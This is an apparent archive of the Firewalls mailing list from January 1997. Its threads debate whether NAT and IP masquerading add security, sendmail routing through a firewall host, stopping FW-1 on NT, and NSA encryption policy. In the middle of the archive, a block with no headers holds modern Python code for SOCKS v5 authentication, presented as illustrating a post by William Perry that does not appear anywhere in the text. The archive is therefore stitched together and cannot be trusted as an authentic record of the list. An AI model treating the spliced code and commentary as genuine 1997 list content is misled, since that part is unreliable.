MJE From firewalls-owner Fri Jan 3 12:48:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA18935 for firewalls-outgoing; Fri, 3 Jan 1997 11:38:04 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA18913 for ; Fri, 3 Jan 1997 11:37:51 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id OAA01156; Fri, 3 Jan 1997 14:37:09 -0500 Date: Fri, 3 Jan 1997 14:37:09 -0500 (EST) From: Todd Graham Lewis To: Russ cc: Firewalls Mailing List Subject: RE: NT NAT In-Reply-To: <41FDA823FC5AD011A0970000E8D5C66771A2@mail.rc.on.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 2 Jan 1997, Russ wrote: > Their network diagram describing how the system would be placed has it > behind a router and in front of the internal LAN. So now someone would > seem to think that it is highly desirable to dedicate an NT Workstation > to the task of NAT-only. Me thinks you could probably get a new router > that supports NAT for less money. I sincerely agree. A much better choice would have been a 386 running a non-bloated OS w/ IP Masquerade. There was a description of just such a setup in this month's SysAdmin magazine for anyone interested. __ Todd Graham Lewis Linux! 
Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Fri Jan 3 12:52:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20954 for firewalls-outgoing; Fri, 3 Jan 1997 11:57:24 -0800 (PST) Received: from kcpgw2.kcp.com (kcpgw2.kcp.com [198.62.69.67]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA20883 for ; Fri, 3 Jan 1997 11:57:01 -0800 (PST) From: dharris@kcp.com Message-Id: <199701031957.LAA20883@miles.greatcircle.com> Received: by kcpgw2.kcp.com id AA15413 (InterLock SMTP Gateway 3.0 for firewalls@GreatCircle.COM); Fri, 3 Jan 1997 13:56:09 -0600 Received: by kcpgw2.kcp.com (Internal Mail Agent-2); Fri, 3 Jan 1997 13:56:09 -0600 Received: by kcpgw2.kcp.com (Internal Mail Agent-1); Fri, 3 Jan 1997 13:56:09 -0600 Mime-Version: 1.0 Date: Fri, 3 Jan 1997 13:46:49 -0600 Subject: Re[2]: NT NAT To: "'Firewalls Mailing List'" , Carl Karlsson Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Added security? Only that extra security provided by not having your network's addresses known to the 'net. The NAT provides no extra protection from someone "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your actual addresses. It also provides no activity logging for later audit, at least not as part of the NAT function. Is it better than nothing? Arguably, yes, because it is an extra layer between your network and the 'net. Is it dangerous? Yes, especially if you think you are protected against attack because you have a NAT. Oops, I suppose I have just contradicted Russ. I think I just said that a NAT does provide some small measure of security. I guess I would put a NAT somewhere way below a screen router in the hierarchy of "firewalls", but I would definitely include it as part of the arsenal of a scapegoat. 
(Q: If the person who runs the web site is the webmaster, the one who runs a postoffice is a postmaster, what is the person who runs the firewall between two networks? A: You call her or him the scapegoat.) ______________________________ Reply Separator _________________________________ Subject: RE: NT NAT Author: Carl Karlsson at INTERNET-MAIL Date: 1/3/97 5:43 PM On Fri, 3 Jan 1997, Russ wrote: > You got anything intelligent to say on just why you think NAT offers ANY > SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. I'd like to know if and why this means that masquerading one's network behind a 'secured' host doesn't provide any added security from just connecting the network straight out? Or am I missing something here (not unusual :)? I was under the impression that if I use some box (Linux with TIS fwtk for example, or that NT box perhaps?) masquerading my network and using 192.168.x.x-addresses inside, I would be at least a little bit more secure than if I had all my w95/nt/unix machines directly connected to the internet? (Not talking super-secure here, not flaming anyone, but just interested! Pointers do nicely if this is already well-known...)
Calle
From firewalls-owner Fri Jan 3 13:52:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA26078 for firewalls-outgoing; Fri, 3 Jan 1997 12:54:10 -0800 (PST) Received: from vespa.unix-ag.uni-siegen.de (vespa.unix-ag.uni-siegen.de [141.99.208.50]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA26046 for ; Fri, 3 Jan 1997 12:53:41 -0800 (PST) Received: from privatehost (sfx@isdn34.hrz.uni-siegen.de [141.99.174.34]) by vespa.unix-ag.uni-siegen.de (8.8.4/8.8.4/sfx-3.0) with ESMTP id VAA14243 for ; Fri, 3 Jan 1997 21:51:53 +0100 (MET) To: "firewalls" In-Reply-To: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr> From: "Lars Eilebrecht" Date: Fri, 03 Jan 1997 14:30:03 +0200 X-Mailer: IntuiNews 1.4 (28.6.96) Subject: Re: sendmail 8.8.4 with firewall Message-ID: <43789509.sfx@shadowbase.unix-ag.uni-siegen.de> Organization: Unix workgroup at the University of Siegen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Mario Misic wrote: > I am running sendmail-8.8.4 on AIX-3.2.5. > > My problem is how to configure sendmail-8.8.4 to send mail over my firewall > server ! > I configure sendmail.cf like they said in README file but .......... ? But _how_ have you configured it? What features are turned on? What errors do you get? If you have a DNS inside your domain which is not directly connected to the outside world you may use something like this in your .mc file:

    define(`SMART_HOST', smtp:your-firewall-host.doma.in)
    LOCAL_NET_CONFIG
    R$* < @ $* . > $*        $#smtp $@ $2. $: $1 < @ $2. > $3

This will forward all mail to hosts inside your domain directly to the host (or its MX) and all other mail will be forwarded to your firewall host as defined by the SMART_HOST option. If you still have problems, try to turn off MX lookups for your firewall host by using 'smtp:[your-firewall-host.doma.in]'.
If you have problems in receiving mail from your firewall system you may want to open the identd port on your firewall system (for local hosts) or recompile sendmail with 'IDENTPROTO*' turned off in 'conf.h'. And if all else fails, check your dns and read the sendmail README again. :) ciao... Lars -- _____ ____ __ /\___// __// / __ sfx@cyberspace.org \ \ / /_\ / /\_\ http://www.cyberspace.org/~sfx/ ___\ \/ __// \ \/_/ /____\/_/ /_/\ \ - The most useful program will be \_\ - continually improved until it is useless. From firewalls-owner Fri Jan 3 14:07:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA00305 for firewalls-outgoing; Fri, 3 Jan 1997 13:43:51 -0800 (PST) Received: from fileserver.wtwitc.com ([204.238.40.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA00270 for ; Fri, 3 Jan 1997 13:43:30 -0800 (PST) Received: by fileserver.wtwitc.com from localhost (router,SLMAILNT V2.2); Fri, 03 Jan 1997 16:08:18 Eastern Standard Time Received: by fileserver.wtwitc.com from zdwells (204.238.40.170::mail daemon; unverified,SLMAILNT V2.2); Fri, 03 Jan 1997 16:08:17 Eastern Standard Time From: "Zachary Wells" To: "Firewalls" Subject: Stopping/Starting FW-1 Date: Fri, 3 Jan 1997 16:08:28 -0500 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1160 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-Id: <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm using fw-1 ver 2.1c for NT. I'm looking for the command line to stop and start the firewall. In the docs it refers to a command fwstart and fwstop. Neither of these two commands exist on my server and fw start and fw stop don't work either. What is the proper command? 
-------------------------------------------------------- Zach Wells Internal Computing Business: zachw@wtwitc.com Personal: ZachW@mindspring.com http://www.wtwitc.com/ Wesson, Taylor, Wells & Associates ------------------ When you want to help people, you tell them the truth. When you want to help yourself, you tell them what they want to hear. -- Thomas Sowell -- -------------------------------------------------------- From firewalls-owner Fri Jan 3 15:12:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02160 for firewalls-outgoing; Fri, 3 Jan 1997 14:14:22 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA02110 for ; Fri, 3 Jan 1997 14:13:57 -0800 (PST) Received: by hidata.com; id AA14945; Fri, 3 Jan 97 14:13:20 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xmaa14941; Fri, 3 Jan 97 14:13:06 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF981.2FDE8430@oscntsrv.hidata.com>; Fri, 3 Jan 1997 14:19:53 -0800 Message-Id: From: "Stout, Bill" To: "'Henry W. Farkas'" Cc: "'Firewall List'" Subject: RE: Huh? I musta misread this! Date: Fri, 3 Jan 1997 14:19:51 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 03, 1997 1:11 PM, Henry W. Farkas[SMTP:hfarkas@ims.advantis.com] wrote: > You appear to be stating that, in the interests of protecting us against the > issues you deliniate above, we should support government control of: crypto, > virus protection, log-on authentication and key escrow. Whoops, that is the _OPPOSITE_ of what I was trying to get across. 
As firewallers we believe in the trusted/untrusted network design philosophy, and a government most definitely fits in the untrusted category. Therefore:
o I do not support government control of crypto.
o I do not support government control of virus protection.
o I do not support government control of logon authentication.
o I do not support government control of Key escrow.
I actually am grateful for the presence of non-malicious hackers who have exposed (otherwise they'd still be present) security holes. Verbosity follows (mouth in foot habit): The competitive culture I left in Los Angeles had a school of thought which went like this: 'Life is a race with the next guy, if there's something you can do to impede him to win, do it'. The culture in Silicon Valley is more like this: 'Life is like climbing a mountain, if people help each other, you can get much further than when alone'. NSAs policy on encryption is like the race with the next guy. If they allowed the private sector to work on encryption, the NSA could reap from the development and add to it for their own security. But then again they are in the Spy business and in a way are against security for those they might want to attack.
Bill Stout From firewalls-owner Fri Jan 3 16:13:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA13951 for firewalls-outgoing; Fri, 3 Jan 1997 15:44:36 -0800 (PST) Received: from pnw.opensys.com (PNW.PNW.OPENSYS.COM [198.202.150.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA13897 for ; Fri, 3 Jan 1997 15:44:08 -0800 (PST) Received: from medina-qe0.opensys.com (medina.opensys.com [198.202.150.3]) by pnw.opensys.com (8.8.4/8.8.4) with SMTP id PAA15990; Fri, 3 Jan 1997 15:50:11 -0800 (PST) Received: from pnw2.opensys.com by medina-qe0.opensys.com via smtpd (for pnw.opensys.com [198.202.150.1]) with SMTP; 3 Jan 1997 23:43:55 UT Received: from unknown (woody [198.202.150.44]) by pnw2.opensys.com (8.8.4/8.8.4) with SMTP id PAA14225; Fri, 3 Jan 1997 15:43:43 -0800 (PST) Message-ID: In-Reply-To: <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> References: Conversation <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> with last message <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> X-MSMail-Priority: Normal X-Priority: 3 To: "Zachary Wells" , "Firewalls" MIME-Version: 1.0 From: "Chris Plunkett" Subject: Re: Stopping/Starting FW-1 Date: Fri, 03 Jan 97 15:41:19 PST Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The services applet in the windows control panel should list the firewall service, simply highlight it and press stop. ---------- > I'm using fw-1 ver 2.1c for NT. I'm looking for the command > line to stop and start the firewall. In the docs it refers > to a command fwstart and fwstop. Neither of these two > commands exist on my server and fw start and fw stop don't > work either. What is the proper command? 
> > -------------------------------------------------------- > Zach Wells > Internal Computing > Business: zachw@wtwitc.com > Personal: ZachW@mindspring.com > http://www.wtwitc.com/ > Wesson, Taylor, Wells & Associates > ------------------ > When you want to help people, > you tell them the truth. > When you want to help yourself, > you tell them what they want to hear. > -- Thomas Sowell -- > -------------------------------------------------------- From firewalls-owner Fri Jan 3 17:20:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA19928 for firewalls-outgoing; Fri, 3 Jan 1997 17:09:24 -0800 (PST) Received: from tsunami.trouble.org (tsunami.trouble.org [206.14.193.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA19894 for ; Fri, 3 Jan 1997 17:09:12 -0800 (PST) Received: (from zen@localhost) by tsunami.trouble.org (5.3/5.3.2-gamma) id RAA17858 for firewalls@greatcircle.com; Fri, 3 Jan 1997 17:08:15 -0800 (PST) Message-Id: <199701040108.RAA17858@tsunami.trouble.org> From: zen@trouble.org (d) Date: Fri, 3 Jan 1997 17:08:14 -0800 X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: firewalls@greatcircle.com Subject: Internet security survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I completed an Internet security survey and wrote up a report about the rather appalling results; it can be seen at: http://www.trouble.org/survey Comments, critique, etc. welcome - -- dan farmer (I got some complaints about people not seeing my announcement the first time around (a couple of weeks ago); please pardon the duplicate notice.) 
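Going back to William Perry's note on SOCKS v5 earlier in this digest (the "publicly available code from NEC" username/password method, and per-user control of who may reach what): the following is an added illustration, not code from Aventail, NEC or any product named in the thread. It builds and parses both sides' bytes for the SOCKS v5 method negotiation (RFC 1928), the username/password sub-negotiation (RFC 1929) and a CONNECT request, then applies a per-user access policy. The credential table, the policy and the hosts in it are constructed sample data.

```python
"""SOCKS v5 (RFC 1928) method negotiation, username/password
sub-negotiation (RFC 1929) and a CONNECT request, both sides built and
parsed by hand.  Added illustration, not Aventail/NEC code; the credential
table and per-user policy below are constructed sample data."""
import hmac
import socket
import struct

SOCKS_VERSION = 0x05
METHOD_NO_AUTH, METHOD_USERPASS, METHOD_NONE_ACCEPTABLE = 0x00, 0x02, 0xFF
AUTH_VERSION = 0x01                     # RFC 1929 sub-negotiation version
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03


# ---------------- client side ----------------
def client_method_offer(methods):
    """Greeting: VER | NMETHODS | METHODS."""
    return bytes([SOCKS_VERSION, len(methods), *methods])

def client_userpass(user, password):
    """RFC 1929 request: VER(1) | ULEN | UNAME | PLEN | PASSWD.  The password
    crosses the wire in the clear, which is what CHAP-style methods avoid."""
    u, p = user.encode(), password.encode()
    if not (1 <= len(u) <= 255 and 1 <= len(p) <= 255):
        raise ValueError("UNAME and PASSWD must each be 1..255 bytes")
    return bytes([AUTH_VERSION, len(u)]) + u + bytes([len(p)]) + p

def client_connect(host, port):
    """Request: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:                      # not a dotted quad: send a domain name
        h = host.encode()
        addr = bytes([ATYP_DOMAIN, len(h)]) + h
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


# ---------------- server side ----------------
def server_select_method(offer, acceptable):
    """Choose the first of the server's acceptable methods that the client
    offered; 0xFF tells the client that no method is acceptable."""
    if len(offer) < 2 or offer[0] != SOCKS_VERSION or len(offer) != 2 + offer[1]:
        raise ValueError("malformed method offer")
    offered = set(offer[2:])
    chosen = next((m for m in acceptable if m in offered), METHOD_NONE_ACCEPTABLE)
    return bytes([SOCKS_VERSION, chosen])

def server_verify_userpass(msg, credentials):
    """Parse an RFC 1929 request and check it against a user->password table
    (both bytes) in constant time.  Returns (reply bytes, username)."""
    if len(msg) < 3 or msg[0] != AUTH_VERSION:
        raise ValueError("bad sub-negotiation version")
    ulen = msg[1]
    if len(msg) < 3 + ulen:
        raise ValueError("truncated username")
    user, plen = msg[2:2 + ulen], msg[2 + ulen]
    if len(msg) != 3 + ulen + plen:
        raise ValueError("length fields do not match message")
    passwd = msg[3 + ulen:]
    ok = user in credentials and hmac.compare_digest(credentials[user], passwd)
    return bytes([AUTH_VERSION, 0x00 if ok else 0x01]), user.decode(errors="replace")

def server_parse_connect(msg):
    """Return (host, port) from a CONNECT request; reject anything else."""
    if len(msg) < 4 or msg[0] != SOCKS_VERSION or msg[1] != CMD_CONNECT:
        raise ValueError("not a SOCKS5 CONNECT")
    atyp = msg[3]
    if atyp == ATYP_IPV4 and len(msg) >= 8:
        host, rest = socket.inet_ntoa(msg[4:8]), msg[8:]
    elif atyp == ATYP_DOMAIN and len(msg) >= 5:
        n = msg[4]
        host, rest = msg[5:5 + n].decode(), msg[5 + n:]
    else:
        raise ValueError("unsupported or truncated address")
    if len(rest) != 2:
        raise ValueError("bad DST.PORT")
    return host, struct.unpack("!H", rest)[0]


# Constructed sample data: who may log in, and what each user may reach.
CREDENTIALS = {b"alice": b"correct horse", b"bob": b"hunter2"}
POLICY = {"alice": {("10.1.2.3", 22), ("intranet.example", 80)},
          "bob": {("intranet.example", 80)}}

def run_exchange(user, password, host, port, credentials=CREDENTIALS, policy=POLICY):
    """Drive one client/server exchange in memory: the server insists on
    username/password, then applies the per-user policy to the CONNECT."""
    greeting = client_method_offer([METHOD_NO_AUTH, METHOD_USERPASS])
    if server_select_method(greeting, [METHOD_USERPASS])[1] != METHOD_USERPASS:
        return "no-acceptable-method"
    status, who = server_verify_userpass(client_userpass(user, password), credentials)
    if status[1] != 0x00:
        return "auth-failed"            # client must close the connection
    dst = server_parse_connect(client_connect(host, port))
    return "ok" if dst in policy.get(who, set()) else "not-allowed"
```

The server here refuses the "no authentication" method outright; in a real deployment the offered and accepted method lists are configuration. Because RFC 1929 carries the password in the clear on every connection, it belongs on a LAN you already trust or underneath an encrypted method, which is the gap the CHAP plug-in mentioned in the post is meant to close.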
From firewalls-owner Fri Jan 3 20:49:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA29106 for firewalls-outgoing; Fri, 3 Jan 1997 20:36:10 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA29082 for ; Fri, 3 Jan 1997 20:35:58 -0800 (PST) Message-Id: <199701040435.UAA29082@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA057492467; Sat, 4 Jan 1997 15:34:28 +1100 From: Darren Reed Subject: Re: NT NAT To: lists@reflections.mindspring.com (Todd Graham Lewis) Date: Sat, 4 Jan 1997 15:34:27 +1100 (EDT) Cc: Russ.Cooper@RC.on.ca, firewalls@GreatCircle.COM In-Reply-To: from "Todd Graham Lewis" at Jan 3, 97 02:37:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Todd Graham Lewis, sie said: > On Thu, 2 Jan 1997, Russ wrote: > > > Their network diagram describing how the system would be placed has it > > behind a router and in front of the internal LAN. So now someone would > > seem to think that it is highly desirable to dedicate an NT Workstation > > to the task of NAT-only. Me thinks you could probably get a new router > > that supports NAT for less money. > > I sincerely agree. A much better choice would have been a 386 running a > non-bloated OS w/ IP Masquerade. There was a description of just such a > setup in this month's SysAdmin magazine for anyone interested. IP Masquerading (and Linux is the only place it is called such) is NAT, so your "better choice" really isn't better at all. Whilst you could buy a PIX or some other router which does the same, they are only more secure in the sense that it isn't running a "normal" OS - it is still running IOS (or whatever it must) and that can still be "broken into" so the gain is minimal. NAT doesn't buy you "security", except for security by obscurity and a little more. 
If the NAT product works as they all should, it should _NOT_ be possible to target an internal machine without it having initiated an external communication first. The obscurity: the attacker doesn't have `direct' access to the internal hosts; the bit extra is if a host inside never requires the NAT, it never has an external IP#. Relying on NAT alone is dangerous, as long as the mapping exists, the host can be attacked. Darren p.s. in case you missed it, IP Masquerading is NOT more secure than NAT.
From firewalls-owner Fri Jan 3 21:29:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA01960 for firewalls-outgoing; Fri, 3 Jan 1997 21:24:24 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA01952 for ; Fri, 3 Jan 1997 21:24:08 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vgOZt-0004FkC (Debian Smail-3.2 1996-Jul-4 #2); Sat, 4 Jan 1997 06:23:29 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Sat, 4 Jan 97 06:23 MET Received: by lina id m0vgNIb-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sat, 4 Jan 1997 05:01:33 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: Re[2]: NT NAT To: dharris@kcp.com Date: Sat, 4 Jan 1997 05:01:32 +0100 (MET) Cc: firewalls@GreatCircle.COM, ckn@findata.se In-Reply-To: <199701031957.LAA20883@miles.greatcircle.com> from "dharris@kcp.com" at Jan 3, 97 01:46:49 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Hello, > Added security? Only that extra security provided by not having your network's > addresses known to the 'net.
> The NAT provides no extra protection from someone > "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your > actual addresses. It also provides no activity logging for later audit, at > least not as part of the NAT function. This is not quite true. NAT can protect you from outside because it only allows you to make connections from the inside to the outside. If you use Linux Masquerading for example there is no way to reach a listening port of the internal network from outside. This is sort of stateful connection filtering. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy
From firewalls-owner Sat Jan 4 00:59:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11236 for firewalls-outgoing; Sat, 4 Jan 1997 00:41:25 -0800 (PST) Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA11229 for ; Sat, 4 Jan 1997 00:41:15 -0800 (PST) Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id JAA18973; Sat, 4 Jan 1997 09:40:51 +0100 Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id JAA17326 for ; Sat, 4 Jan 1997 09:40:47 +0100 Date: Sat, 4 Jan 1997 09:40:46 +0100 (MET) From: Carl Karlsson X-Sender: ckn@wintermute.marievik.findata.se To: "'Firewalls Mailing List'" Subject: Re: Re[2]: NT NAT In-Reply-To: <199701031957.LAA20883@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
On Fri, 3 Jan 1997 dharris@kcp.com wrote: > Added security?
> Only that extra security provided by not having your network's > addresses known to the 'net. The NAT provides no extra protection from someone > "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your > actual addresses. It also provides no activity logging for later audit, at > least not as part of the NAT function. Please correct me if I'm wrong here but I was under the impression that the 192.168.x.x-addresses were 'non-routable' or whatever the term is. Under what circumstances can an external intruder gain access to my internal 192.168.x.x-machines? I'm not arguing that NAT is a great firewall, I'm just trying to understand what the risks are with masquerading 'illegal' addresses behind a machine that is 'secure enough'. And, sorry, just saying it's useless without any argument just isn't enough. :) Calle
From firewalls-owner Sat Jan 4 08:01:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA20232 for firewalls-outgoing; Sat, 4 Jan 1997 07:44:35 -0800 (PST) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA20225 for ; Sat, 4 Jan 1997 07:44:25 -0800 (PST) Received: (qmail 12910 invoked from smtpd); 4 Jan 1997 15:44:01 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 4 Jan 1997 15:44:01 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id JAA19436; Sat, 4 Jan 1997 09:44:00 -0600 Received: by sonic.nmti.com; id AA00908; Sat, 4 Jan 1997 09:43:55 -0600 From: peter@baileynm.com (Peter da Silva) Message-Id: <9701041543.AA00908@sonic.nmti.com.nmti.com> Subject: Re: Re[2]: NT NAT To: ckn@findata.se (Carl Karlsson) Date: Sat, 4 Jan 1997 09:43:54 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Carl Karlsson" at Jan 4, 97 09:40:46 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender:
firewalls-owner@GreatCircle.COM Precedence: bulk
> Please correct me if I'm wrong here but I was under the impression that > the 192.168.x.x-addresses were 'non-routable' or whatever the term is. > Under what circumstances can an external intruder gain access to my > internal 192.168.x.x-machines? Source routed packets.
From firewalls-owner Sat Jan 4 08:29:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA21385 for firewalls-outgoing; Sat, 4 Jan 1997 08:21:32 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA21359 for ; Sat, 4 Jan 1997 08:21:20 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id IAA20830; Sat, 4 Jan 1997 08:19:48 -0800 (PST) Message-Id: <3.0.32.19970104111733.006caf34@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 04 Jan 1997 11:17:37 -0500 To: peter@baileynm.com (Peter da Silva) From: Paul Ferguson Subject: Re: Re[2]: NT NAT Cc: ckn@findata.se (Carl Karlsson), firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
At 09:43 AM 1/4/97 -0600, Peter da Silva wrote: >> Please correct me if I'm wrong here but I was under the impression that >> the 192.168.x.x-addresses were 'non-routable' or whatever the term is. >> Under what circumstances can an external intruder gain access to my >> internal 192.168.x.x-machines? > >Source routed packets. > Which are easily stopped. - paul -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Jan 4 11:30:11 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA27275 for firewalls-outgoing; Sat, 4 Jan 1997 11:21:21 -0800 (PST) Received: from hotstar.net (hotstar.net [204.191.136.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA27268 for ; Sat, 4 Jan 1997 11:21:11 -0800 (PST) Received: from istar.ca (istar.ca [204.191.136.4]) by hotstar.net (8.7.3/8.7) with ESMTP id OAA17838; Sat, 4 Jan 1997 14:22:56 -0500 (EST) Received: from ts56-08.tor.iSTAR.ca (ts56-08.tor.iSTAR.ca [204.191.142.108]) by istar.ca (8.8.4/8.8.4) with SMTP id OAA11275; Sat, 4 Jan 1997 14:20:46 -0500 (EST) Received: by ts56-08.tor.iSTAR.ca with Microsoft Mail id <01BBFA4A.7180A200@ts56-08.tor.iSTAR.ca>; Sat, 4 Jan 1997 14:20:32 -0500 Message-ID: <01BBFA4A.7180A200@ts56-08.tor.iSTAR.ca> From: Gene Lee To: "'Henry W. Farkas'" , "'Stout, Bill'" Cc: "'Firewall List'" Subject: RE: Huh? I musta misread this! Date: Sat, 4 Jan 1997 14:20:30 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 03, 1997 5:19 PM, Stout, Bill[SMTP:bill.stout@hidata.com] wrote: >The compeditive culture I left in Los Angeles had a school of >thought which went like this: 'Life is a race with the next guy, >if there's something you can do to impede him to win, do it'. >The culture in Silicon Valley is more like this: 'Life is like >climbing a mountain, if people help each other, you can get much >further than when alone'. > >NSAs policy on encryption is like the race with the next guy. > >If they allowed the private sector to work on encryption, the NSA >could reap from the development and add to it for their own security. >But then again they are in the Spy business and in a way are against >security for those they might want to attack. 
That and the fact that it's generally thought that the NSA is light-years ahead of any other agency/organization in encryption technology. No one can help them get further up the mountain, so they are simply interested in keeping everyone else as far down the mountain as possible...

--
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Sat Jan 4 16:29:01 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA08204 for firewalls-outgoing; Sat, 4 Jan 1997 16:17:14 -0800 (PST)
Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA08197 for ; Sat, 4 Jan 1997 16:17:07 -0800 (PST)
